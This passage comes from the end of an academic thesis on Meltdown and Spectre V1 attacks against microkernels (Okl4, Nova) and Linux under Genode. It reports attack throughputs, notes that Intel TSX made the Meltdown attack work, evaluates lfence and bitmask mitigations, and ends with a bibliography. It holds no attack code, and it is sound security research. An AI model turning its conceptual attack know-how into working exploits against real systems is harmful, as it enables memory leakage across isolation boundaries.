Figures 4.11 to 4.13 show the number of CPU cycles needed to use our RPC both with and without Spectre V1 mitigations. Together with Tables 4.14 and 4.15, they show that the mitigations had no real impact on performance; in some cases, the RPC with mitigations was faster than the RPC without them. Both the lfence and the bitmask mitigation should only need a small number of CPU cycles to execute compared to the tens of thousands of cycles needed to run the RPC.

5.4 Source criticism

There are some concerns with the sources used in this thesis. With regard to CPU optimizations, information is in many cases not very specific, describing only the principal mechanisms and not the exact rules by which they function. This leaves the methodology and results prone to anomalies that are difficult to explain. Information about the exact workings of many of these mechanisms is proprietary and thus not available. However, for the purpose of these experiments, these models have proven sufficient to implement working attacks. An exception to these hardware-related error sources is the timing methods. This information is deemed more reliable, as Intel has published exact recommendations for timing on their CPUs. Similarly, for Intel TSX, the inner workings of the instruction set are not of interest for these attacks, only its public specification.

For the implementation of Meltdown and Spectre, the primary sources are the original papers [31, 24]. These also contain POC implementations, which have been used to define implementation parameters as well as central design concepts. Although these are considered good sources, the workings of the presented Meltdown and Spectre POCs are not described in detail. There is a substantial body of work related to Meltdown [31, 36, 45] and Spectre [24, 33, 42, 22], but very few of these works present source code. Consequently, a combination of these POCs and implementations found on GitHub has been used. We cannot vouch for the quality of these sources beyond their merit of supplying working implementations.

For information regarding Genode, the primary source has been the book Genode Foundations [7] by Feske. Some other work relating to security and Genode was found via Google Scholar, primarily relating to the use of Genode and ARM TrustZone for Android. No work related to Meltdown and Spectre on Genode has been found. Therefore, an email from Feske¹ has been the primary source of information on microarchitectural attacks in Genode. The databases IEEE Xplore, ACM Digital Library and Google Scholar were used to search for sources on Genode.



5.5 The Work in a Wider Context

The subject of microarchitectural attacks, Spectre and Meltdown in particular, has received much attention since the work of Kocher et al. [24] and Lipp et al. [31]. This is no surprise, as Lipp et al. showed that the Meltdown attack can dump memory from a victim process, demonstrating this on Firefox. Similarly, Kocher et al. showed that a Spectre attack can be used to leak host memory from within a virtualized environment. Since then, several others have contributed to these types of attacks. As pointed out by Mcilroy et al. [33], microarchitectural attacks are not easily resolvable, and they are a bigger problem than previously anticipated. Mcilroy et al. found abstractions to be an issue: our view of how the CPU functions is overly simplified, and knowledgeable attackers may exploit this fact, especially in the pursuit of uncompromising performance. One such simplification is the assumption that microarchitectural state is unobservable. Although CPUs become faster, they also become more complex; this complexity comes with a security cost and likely requires further complexity to address security issues. Microkernels are certainly an approach to reducing the complexity of the core kernel, but the kernel's separation is threatened if user processes can bypass the kernel's barriers.

5.5.1 Can OS Memory Separation be Trusted?

As pointed out by Mcilroy et al. [33], OS memory separation can be of great use, since separation within a user process cannot be guaranteed when the hardware is untrusted. Memory protection by the OS may be of some help; if not against Spectre, it definitely protects against the workings of Meltdown. Microkernels may not by definition mitigate Meltdown, but they may expose less information that Meltdown can exploit. Furthermore, there is little to indicate that microkernels help with respect to Spectre. There are mitigations for variants of Spectre, but new versions of the attack, such as NetSpectre [42] and SpectreRSB [25], indicate that the problem may be bigger than anticipated. However, something that may prove in favor of microkernels is their small code size, which may make analysis against microarchitectural attacks easier. Still, the problem remains, as many of the issues are closely related to the workings of the hardware.

5.5.2 Can Hardware Separation be Trusted?

The scope of Spectre attacks is likely more widespread than anticipated, as stated by Mcilroy et al. [33]. Although they were not successful in demonstrating these attacks on ARM and AMD CPUs, these CPUs also use an RSB. Thus, it may be of interest to investigate the possibility of using SCAs to violate the ARM TrustZone use cases for Genode. It is likely that some use cases are vulnerable to SCAs, as Bukasa et al. [3] have demonstrated that ARM TrustZone is ineffective at preventing power-analysis SCAs, and Lapid and Wool [29] mounted a side-channel cache attack against the ARM32 AES implementation.

5.5.3 Consequences for Security and Safety Critical Systems

The presence of microarchitectural attacks may compromise claims of security against certain types of attacks. Still, a secure design may provide valuable guarantees against other types of attacks. Microarchitectural attacks are not trivial to construct and in many cases require execution privileges on the device. However, the difficulty of executing such attacks may change, and local execution privileges are not always required, as shown by Schwarz et al. with NetSpectre [42] and by Lipp et al. [30]. For highly safety- or security-critical applications, such as medical devices and vehicular communications, using specialized hardware that is not affected by known attacks needs to be considered.


5.5.4 Impact of This Work

Microarchitectural attacks do pose a threat to privacy and security, as demonstrated by several works [31]². This work demonstrates that efforts to obtain a truly secure kernel using Genode are not free of security flaws: the kernel may still be vulnerable to microarchitectural attacks. Consequently, high-assurance applications still cannot give absolute guarantees. There is a need for awareness of microarchitectural attacks and possibly for mitigations. In the case demonstrated in this thesis, countermeasures can be put in place to secure communication mechanisms against Spectre V1.

² J. Corbet. Meltdown/Spectre mitigation for 4.15 and beyond [LWN.net]. Jan. 2018. URL: https://lwn.net/Articles/744287/ (visited on 2019-03-25).




6 Conclusion

In this thesis we have examined the vulnerability of microkernels with respect to the microarchitectural attacks Meltdown and Spectre V1. Furthermore, the performance impact of Spectre V1 mitigations was examined. The targeted kernels were the microkernels Okl4 and Nova, as well as Linux. These kernels were run within the Genode OS framework for evaluation. The successful Meltdown implementation required Intel TSX, as suppressing the segmentation fault with a custom handler was not an option. Another design based on spawning processes may prove successful but incurs extra runtime costs; no successful results were produced with such a design.

• Can Flush+Reload be used to create a covert channel between two processes in Genode, measured as the throughput of the demonstrated channel?

A covert Flush+Reload channel was demonstrated in Genode with a throughput of 36 Bps on Okl4, 44 Bps on Nova and 13409 Bps on Linux. The large discrepancy between Linux and the microkernels is deemed likely to stem from scheduling differences.

• Are RPC mechanisms in the microkernels Nova and Okl4 vulnerable to Spectre, measured as the throughput of the demonstrated attack?

The microkernels were determined to be vulnerable to Spectre V1, and a POC was produced with a throughput of 1029 Bps on Okl4, 1760 Bps on Nova and 525 Bps on Linux.

• Can the Meltdown attack be executed on Genode?

Results regarding the microkernels' vulnerability to Meltdown are inconclusive. However, an attack reading the secret of another process in Genode running on Linux was demonstrated with a throughput of up to 11070 Bps.

• What is the performance impact of Spectre V1 mitigation alternatives, measured as the relative slowdown of RPC mechanisms?

The Spectre V1 mitigations of bitmasking and instruction-stream serialization were evaluated, yielding a mean relative slowdown of at most 0.8% for serialization and 3.1% for bitmasking, see Tables 4.14 and 4.15.

It was determined that microkernels and Genode are not secure by design against microarchitectural attacks. This has been demonstrated by the Spectre V1 attack, with a throughput on the order of 1 kB/s, and the Meltdown attack, with a throughput on the order of 10 kB/s. Microkernels do have some benefits with regard to mitigating Meltdown, as several kernels do not map kernel space into user space and are consequently only affected by Meltdown in a limited way. In addition, Genode does not support custom segmentation fault handlers. Consequently, the Meltdown attack requires another recovery tool; one viable option is Intel TSX.

6.1 Future Work

For future work, the most obvious step is to determine a target for the Meltdown attack against microkernels in Genode and rigorously attack these targeted addresses. It could also be interesting to pursue another segmentation fault recovery design, as Intel TSX is only present on some Intel CPUs [20].

With respect to Spectre V1, it may be interesting to target existing Genode components that expose vulnerable RPCs, or to implement other Spectre variants that use different techniques, such as variants 2 and 3 or SpectreRSB [24, 25]. Trying these variants can further establish the scope of Spectre's impact on microkernels.


Bibliography

[1] T. Brito, N. O. Duarte, and N. Santos. “ARM TrustZone for Secure Image Processing on the Cloud”. In: IEEE 35th Symposium on Reliable Distributed Systems Workshops (SRDSW). Sept. 2016, pp. 37–42. DOI: 10.1109/SRDSW.2016.17.

[2] D. Brumley and D. Boneh. “Remote Timing Attacks Are Practical”. In: Proceedings of the 12th Conference on USENIX Security Symposium. Washington, DC: USENIX Association, 2003.

[3] S. K. Bukasa, R. Lashermes, H. Le Bouder, J. Lanet, and A. Legay. “How TrustZone Could Be Bypassed: Side-Channel Attacks on a Modern System-on-Chip”. In: Information Security Theory and Practice. Ed. by G. P. Hancke and E. Damiani. Vol. 10741. Cham: Springer International Publishing, 2018, pp. 93–109. ISBN: 978-3-319-93523-2, 978-3-319-93524-9. DOI: 10.1007/978-3-319-93524-9_6.

[4] cgroups(7) - Linux manual page. URL: http://man7.org/linux/man-pages/man7/cgroups.7.html (visited on 2019-02-21).

[5] S. Constable, A. Sahebolamri, and S. Chapin. “Extending seL4 Integrity to the Genode OS Framework”. In: (2017).

[6] J. Corbet and G. Kroah-Hartman. “Linux Kernel Development: How Fast It Is Going, Who Is Doing It, What They Are Doing and Who Is Sponsoring the Work”. In: (2016), p. 18. URL: http://go.linuxfoundation.org/l/6342/el-Development-Report-2016-pdf/3vr4pg.

[7] N. Feske. Foundations: GENODE Operating System Framework 18.05. GENODE LABS, 2018. URL: https://genode.org/documentation/genode-foundations-18-05.pdf.

[8] Q. Ge, Y. Yarom, D. Cock, and G. Heiser. “A survey of microarchitectural timing attacks and countermeasures on contemporary hardware”. In: Journal of Cryptographic Engineering 8.1 (Apr. 2018), pp. 1–27. ISSN: 2190-8508, 2190-8516. DOI: 10.1007/s13389-016-0141-6.

[9] D. Gens, O. Arias, D. Sullivan, C. Liebchen, Y. Jin, and A. R. Sadeghi. “LAZARUS: Practical Side-Channel Resilient Kernel-Space Randomization”. In: Research in Attacks, Intrusions, and Defenses. Ed. by M. Dacier, M. Bailey, M. Polychronakis, and M. Antonakakis. Springer International Publishing, 2017, pp. 238–258. ISBN: 978-3-319-66332-6.


[10] D. Gruss, R. Spreitzer, and S. Mangard. “Cache Template Attacks: Automating Attackson Inclusive Last-level Caches”. In: Proceedings of the 24th USENIX Conference on SecuritySymposium. SEC. event-place: Washington, D.C. USENIX Association, 2015, pp. 897–912. ISBN: 978-1-931971-23-2.

[11] D. Gullasch, E. Bangerter, and S. Krenn. “Cache Games – Bringing Access-Based Cache Attacks on AES to Practice”. In: IEEE Symposium on Security and Privacy. IEEE, May 2011, pp. 490–505. ISBN: 978-1-4577-0147-4. DOI: 10.1109/SP.2011.22.

[12] M. Hamad, M. Nolte, and V. Prevelakis. “A framework for policy based secure intravehicle communication”. In: 2017 IEEE Vehicular Networking Conference (VNC). Nov. 2017, pp. 1–8. DOI: 10.1109/VNC.2017.8275646.

[13] M. Hamad and V. Prevelakis. “Implementation and performance evaluation of embedded IPsec in microkernel OS”. In: World Symposium on Computer Networks and Information Security (WSCNIS). Sept. 2015, pp. 1–7. DOI: 10.1109/WSCNIS.2015.7368294.

[14] S. Harp, T. Carpenter, and J. Hatcliff. “A Reference Architecture for Secure Medical Devices”. In: Biomedical Instrumentation & Technology 52.5 (Sept. 2018), pp. 357–365. ISSN: 0899-8205. DOI: 10.2345/0899-8205-52.5.357.

[15] U. Drepper. “What Every Programmer Should Know About Memory”. Red Hat, Inc., 2007, p. 114.

[16] C. Hawblitzel, J. Howell, J. R. Lorch, A. Narayan, B. Parno, D. Zhang, and B. Zill. “Ironclad Apps: End-to-end Security via Automated Full-System Verification”. In: Proceedings of the 11th USENIX Conference on Operating Systems Design and Implementation. 2014, p. 18. ISBN: 978-1-931971-16-4.

[17] P. K. Immich, R. S. Bhagavatula, and R. Pendse. “Performance analysis of five interprocess communication mechanisms across UNIX operating systems”. In: The Journal of Systems & Software 68 (2003), pp. 27–43. ISSN: 0164-1212. DOI: 10.1016/S0164-1212(02)00134-6.

[18] Intel Corporation. “Intel Analysis of Speculative Execution Side Channels”. In: (2018), p. 12.

[19] Intel Corporation. “Intel® 64 and IA-32 Architectures Optimization Reference Manual”. In: (2016), p. 672.

[20] Intel Corporation. “Intel® 64 and IA-32 Architectures Software Developer’s Manual Documentation Changes”. In: (Sept. 2016), p. 1299.

[21] G. Irazoqui, T. Eisenbarth, and B. Sunar. “S$A: A Shared Cache Attack That Works across Cores and Defies VM Sandboxing – and Its Application to AES”. In: IEEE Symposium on Security and Privacy. 2015, pp. 591–604. DOI: 10.1109/SP.2015.42.

[22] V. Kiriansky and C. Waldspurger. “Speculative Buffer Overflows: Attacks and Defenses”. In: (July 2018).

[23] G. Klein, K. Elphinstone, G. Heiser, J. Andronick, D. Cock, P. Derrin, D. Elkaduwe, K. Engelhardt, R. Kolanski, M. Norrish, T. Sewell, H. Tuch, and S. Winwood. “seL4: Formal Verification of an OS Kernel”. In: 22nd Symposium on Operating Systems Principles (SOSP). ACM, 2009, pp. 207–220. ISBN: 978-1-60558-752-3. DOI: 10.1145/1629575.1629596.

[24] P. Kocher, J. Horn, A. Fogh, D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom. “Spectre Attacks: Exploiting Speculative Execution”. In: 40th IEEE Symposium on Security and Privacy (S&P). 2019.

[25] E. M. Koruyeh, K. N. Khasawneh, C. Song, and N. Abu-Ghazaleh. “Spectre Returns! Speculation Attacks using the Return Stack Buffer”. In: 12th Workshop on Offensive Technologies (WOOT) (2018), p. 12.

[26] C. Lameter. “Extreme high performance computing or why microkernels suck”. In: Proceedings of the Ottawa Linux Symposium. 2007.

[27] B. W. Lampson. “A Note on the Confinement Problem”. In: Commun. ACM 16.10 (Oct. 1973), pp. 613–615. ISSN: 0001-0782. DOI: 10.1145/362375.362389.

[28] M. Lange, S. Liebergeld, A. Lackorzynski, A. Warg, and M. Peter. “L4Android: A Generic Operating System Framework for Secure Smartphones”. In: Proceedings of the 1st ACM Workshop on Security and Privacy in Smartphones and Mobile Devices. SPSM. ACM, 2011, pp. 39–50. ISBN: 978-1-4503-1000-0. DOI: 10.1145/2046614.2046623.

[29] B. Lapid and A. Wool. “Cache-Attacks on the ARM TrustZone Implementations of AES-256 and AES-256-GCM via GPU-Based Analysis”. In: Selected Areas in Cryptography (SAC). Ed. by C. Cid and M. J. Jacobson. Vol. 11349. 2019, pp. 235–256. ISBN: 978-3-030-10969-1, 978-3-030-10970-7. DOI: 10.1007/978-3-030-10970-7_11.

[30] M. Lipp, M. T. Aga, M. Schwarz, D. Gruss, C. Maurice, L. Raab, and L. Lamster. “Nethammer: Inducing Rowhammer Faults through Network Requests”. In: abs/1805.04956 (May 2018).

[31] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg. “Meltdown: Reading Kernel Memory from User Space”. In: 27th USENIX Security Symposium. 2018.

[32] F. Liu, Y. Yarom, Q. Ge, G. Heiser, and R. B. Lee. “Last-Level Cache Side-Channel Attacks are Practical”. In: IEEE Symposium on Security and Privacy. IEEE, May 2015, pp. 605–622. ISBN: 978-1-4673-6949-7. DOI: 10.1109/SP.2015.43.

[33] R. McIlroy, J. Sevcik, T. Tebbi, B. L. Titzer, and T. Verwaest. “Spectre is here to stay: An analysis of side-channels and speculative execution”. In: abs/1902.05178 (Feb. 2019). arXiv: 1902.05178.

[34] G. Paoloni. How to Benchmark Code Execution Times on Intel IA-32 and IA-64 Instruction Set Architectures. Sept. 2010.

[35] P. Pessl, D. Gruss, C. Maurice, M. Schwarz, and S. Mangard. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks”. In: 2016, pp. 565–581.

[36] A. Prout, W. Arcand, D. Bestor, B. Bergeron, C. Byun, V. Gadepally, M. Houle, M. Hubbell, M. Jones, A. Klein, P. Michaleas, L. Milechin, J. Mullen, A. Rosa, S. Samsi, C. Yee, A. Reuther, and J. Kepner. “Measuring the Impact of Spectre and Meltdown”. In: IEEE High Performance extreme Computing Conference (HPEC). Sept. 2018, pp. 1–5. DOI: 10.1109/HPEC.2018.8547554.

[37] J. R. Ramos. “TrustFrame, a Software Development Framework for TrustZone-enabled Hardware”. PhD thesis. Tecnico Ulisboa, Nov. 2016.

[38] P. S. Ribeiro, N. Santos, and N. O. Duarte. “DBStore: A TrustZone-backed Database Management System for Mobile Applications”. In: (2018), p. 8. DOI: 10.5220/0006883603960403.

[39] W. Schmidt, M. Hanspach, and J. Keller. “A Case Study on Covert Channel Establishment via Software Caches in High-Assurance Computing Systems”. In: (Aug. 2015).

[40] M. Schwarz, M. Lipp, D. Moghimi, J. Van Bulck, J. Stecklina, T. Prescher, and D. Gruss. “ZombieLoad: Cross-Privilege-Boundary Data Sampling”. In: (May 2019), p. 15.

[41] M. Schwarz, C. Maurice, D. Gruss, and S. Mangard. “Fantastic Timers and Where to Find Them: High-Resolution Microarchitectural Attacks in JavaScript”. In: Financial Cryptography and Data Security. Lecture Notes in Computer Science. Springer International Publishing, 2017, pp. 247–267. ISBN: 978-3-319-70972-7.

[42] M. Schwarz, M. Schwarzl, M. Lipp, and D. Gruss. “NetSpectre: Read Arbitrary Memory over Network”. In: abs/1807.10535 (2018).

[43] B. Stuart. “Current state of mitigations for Spectre within operating systems”. In: Proceedings of Workshop on Advanced Microkernel Operating Systems (WAMOS) (2018), p. 5.

[44] A. Thongthua and S. Ngamsuriyaroj. “Assessment of Hypervisor Vulnerabilities”. In: International Conference on Cloud Computing Research and Innovations (ICCCRI) (2016), p. 71. ISBN: 978-1-5090-3951-7. DOI: 10.1109/ICCCRI.2016.19.

[45] C. Trippel, D. Lustig, and M. Martonosi. “MeltdownPrime and SpectrePrime: Automatically-Synthesized Attacks Exploiting Invalidation-Based Coherence Protocols”. In: CoRR abs/1802.03802 (2018).

[46] D. Waddington, J. Colmenares, J. Kuang, and F. Song. “KV-Cache: A Scalable High-Performance Web-Object Cache for Manycore”. In: IEEE/ACM 6th International Conference on Utility and Cloud Computing. IEEE, Dec. 2013, pp. 123–130. ISBN: 978-0-7695-5152-4. DOI: 10.1109/UCC.2013.34.

[47] Y. Xiao, X. Zhang, Y. Zhang, and R. Teodorescu. “One Bit Flips, One Cloud Flops: Cross-VM Row Hammer Attacks and Privilege Escalation”. In: USENIX Association, 2016, pp. 19–35. ISBN: 978-1-931971-32-4.

[48] Y. Yarom and K. Falkner. “FLUSH+RELOAD: A High Resolution, Low Noise, L3 Cache Side-Channel Attack”. In: 23rd USENIX Security Symposium (USENIX Security). The USENIX Association, 2014. ISBN: 978-1-931971-15-7.

[49] Z. Yu, C. Yuan, X. Wei, Y. Gao, and L. Wang. “Message-passing interprocess communication design in seL4”. In: 5th International Conference on Computer Science and Network Technology (ICCSNT). Dec. 2016, pp. 418–422. DOI: 10.1109/ICCSNT.2016.8070192.

[50] P. Zhou, T. Wang, G. Li, F. Zhang, and X. Zhao. “Analysis on the parameter selection method for FLUSH+RELOAD based cache timing attack on RSA”. In: China Communications 12.6 (June 2015), pp. 33–45. ISSN: 1673-5447. DOI: 10.1109/CC.2015.7122479.
